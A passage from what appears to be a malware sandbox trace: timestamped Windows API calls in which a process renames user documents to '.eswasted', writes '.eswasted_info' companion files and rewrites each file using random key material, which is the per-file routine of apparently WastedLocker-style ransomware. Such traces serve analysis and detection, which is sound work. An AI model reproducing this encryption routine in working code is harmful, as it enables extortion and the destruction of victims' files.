halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\zmpmhpvtc4 cho8ti\\-vqteawa6vyq.ods.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0075.741] WriteFile (in: hFile=0x108, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0075.742] SetEndOfFile (hFile=0x108) returned 1 [0075.742] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.742] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0075.742] lstrcpyW (in: lpString1=0x70c224, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.742] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\-vqTeAwa6Vyq.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\zmpmhpvtc4 cho8ti\\-vqteawa6vyq.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\-vqTeAwa6Vyq.ods.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\zmpmhpvtc4 cho8ti\\-vqteawa6vyq.ods.eswasted")) returned 1 [0075.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\u-zzifvzTlp_CK\\ZMpMHpVtC4 chO8TI\\-vqTeAwa6Vyq.ods.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u-zzifvztlp_ck\\zmpmhpvtc4 cho8ti\\-vqteawa6vyq.ods.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0075.743] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0075.743] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x168c4 [0075.743] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x168c4) returned 0x330000 [0075.743] CloseHandle (hObject=0x124) returned 1 [0075.750] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0075.750] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0075.750] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.751] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0075.751] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0075.751] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.760] SetEndOfFile (hFile=0x108) returned 1 [0075.762] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0075.762] CloseHandle (hObject=0x108) returned 1 [0075.763] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0075.763] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x720fc8 | out: hHeap=0x6d0000) returned 1 [0075.764] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0075.764] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0075.764] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.764] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\U7Eq.pdf") returned 57 [0075.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27c) returned 0x719d90 [0075.764] lstrcpyW (in: lpString1=0x719e02, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.765] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0075.765] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0075.765] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0075.765] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\U7Eq.pdf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u7eq.pdf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0075.766] WriteFile (in: hFile=0x108, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0075.767] SetEndOfFile (hFile=0x108) returned 1 [0075.767] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.768] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0075.768] lstrcpyW (in: lpString1=0x719e02, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.768] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\U7Eq.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u7eq.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\U7Eq.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u7eq.pdf.eswasted")) returned 1 [0075.768] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Cg7H\\U7Eq.pdf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cg7h\\u7eq.pdf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.768] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0075.768] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x50a8 [0075.768] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x50a8) returned 0x330000 [0075.769] CloseHandle (hObject=0x11c) returned 1 [0075.771] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0075.772] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0075.772] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.772] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0075.772] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0075.772] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.829] SetEndOfFile (hFile=0x108) returned 1 [0075.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0075.840] CloseHandle (hObject=0x108) returned 1 [0075.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719d90 | out: hHeap=0x6d0000) returned 1 [0075.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71aad0 | out: hHeap=0x6d0000) returned 1 [0075.842] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0075.843] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0075.843] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.843] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e0Py_V3m.xls") returned 56 [0075.843] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x27a) returned 0x719d90 [0075.843] lstrcpyW (in: lpString1=0x719e00, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.843] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0075.843] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0075.844] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0075.844] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e0Py_V3m.xls.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e0py_v3m.xls.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0075.844] WriteFile (in: hFile=0x108, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0075.845] SetEndOfFile (hFile=0x108) returned 1 [0075.846] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.846] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0075.846] lstrcpyW (in: lpString1=0x719e00, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.846] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e0Py_V3m.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e0py_v3m.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e0Py_V3m.xls.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e0py_v3m.xls.eswasted")) returned 1 [0075.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e0Py_V3m.xls.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e0py_v3m.xls.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0075.846] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0075.847] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x948b [0075.847] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x948b) returned 0x330000 [0075.847] CloseHandle (hObject=0x124) returned 1 [0075.850] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0075.850] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0075.850] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.850] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0075.851] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0075.851] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.860] SetEndOfFile (hFile=0x108) returned 1 [0075.862] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0075.862] CloseHandle (hObject=0x108) returned 1 [0075.866] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719d90 | out: hHeap=0x6d0000) returned 1 [0075.866] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719be0 | out: hHeap=0x6d0000) returned 1 [0075.866] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0075.904] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0075.904] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.904] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWaH\\7hSMvVsIoU.docx") returned 64 [0075.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28a) returned 0x6f5cc0 [0075.904] lstrcpyW (in: lpString1=0x6f5d40, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.904] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0075.904] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0075.905] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0075.905] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWaH\\7hSMvVsIoU.docx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gwah\\7hsmvvsiou.docx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0075.907] WriteFile (in: hFile=0x108, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0075.907] SetEndOfFile (hFile=0x108) returned 1 [0075.908] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.908] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.908] lstrcpyW (in: lpString1=0x6f5d40, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.908] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWaH\\7hSMvVsIoU.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gwah\\7hsmvvsiou.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWaH\\7hSMvVsIoU.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gwah\\7hsmvvsiou.docx.eswasted")) returned 1 [0075.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GWaH\\7hSMvVsIoU.docx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gwah\\7hsmvvsiou.docx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0075.908] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0075.908] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x15678 [0075.909] MapViewOfFile (hFileMappingObject=0x130, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15678) returned 0x330000 [0075.909] CloseHandle (hObject=0x11c) returned 1 [0075.913] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0075.914] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0075.914] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.914] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0075.915] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0075.915] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.923] SetEndOfFile (hFile=0x108) returned 1 [0075.925] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.925] CloseHandle (hObject=0x108) returned 1 [0075.927] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0075.927] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719cb0 | out: hHeap=0x6d0000) returned 1 [0075.927] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0075.928] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0075.928] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.928] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lfguv.xlsx") returned 54 [0075.928] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x276) returned 0x719af0 [0075.928] lstrcpyW (in: lpString1=0x719b5c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.928] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71c050 [0075.928] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0075.929] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71c050 | out: pbBuffer=0x71c050) returned 1 [0075.929] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lfguv.xlsx.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lfguv.xlsx.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0075.941] WriteFile (in: hFile=0x108, lpBuffer=0x71c050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71c050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0075.942] SetEndOfFile (hFile=0x108) returned 1 [0075.942] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.942] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0075.942] lstrcpyW (in: lpString1=0x719b5c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.942] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lfguv.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lfguv.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lfguv.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lfguv.xlsx.eswasted")) returned 1 [0075.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lfguv.xlsx.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lfguv.xlsx.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0075.943] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0075.943] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x114fdd4 | out: lpFileSizeHigh=0x114fdd4*=0x0) returned 0x6a22 [0075.943] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a22) returned 0x330000 [0075.944] CloseHandle (hObject=0x130) returned 1 [0075.975] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0075.976] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0075.976] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.976] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0075.977] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0075.977] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.985] SetEndOfFile (hFile=0x108) returned 1 [0075.987] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0075.987] CloseHandle (hObject=0x108) returned 1 [0075.989] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719af0 | out: hHeap=0x6d0000) returned 1 [0075.989] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719960 | out: hHeap=0x6d0000) returned 1 [0075.989] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0075.990] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0075.990] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.990] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico") returned 73 [0075.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x29c) returned 0x6f5cc0 [0075.990] lstrcpyW (in: lpString1=0x6f5d52, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0075.990] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x71a288 [0075.990] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0075.991] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x71a288 | out: pbBuffer=0x71a288) returned 1 [0075.991] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0075.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0075.992] WriteFile (in: hFile=0x108, lpBuffer=0x71a288*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x71a288*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0075.993] SetEndOfFile (hFile=0x108) returned 1 [0075.993] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.993] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71a288 | out: hHeap=0x6d0000) returned 1 [0075.993] lstrcpyW (in: lpString1=0x6f5d52, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0075.993] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.eswasted")) returned 1 [0076.058] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 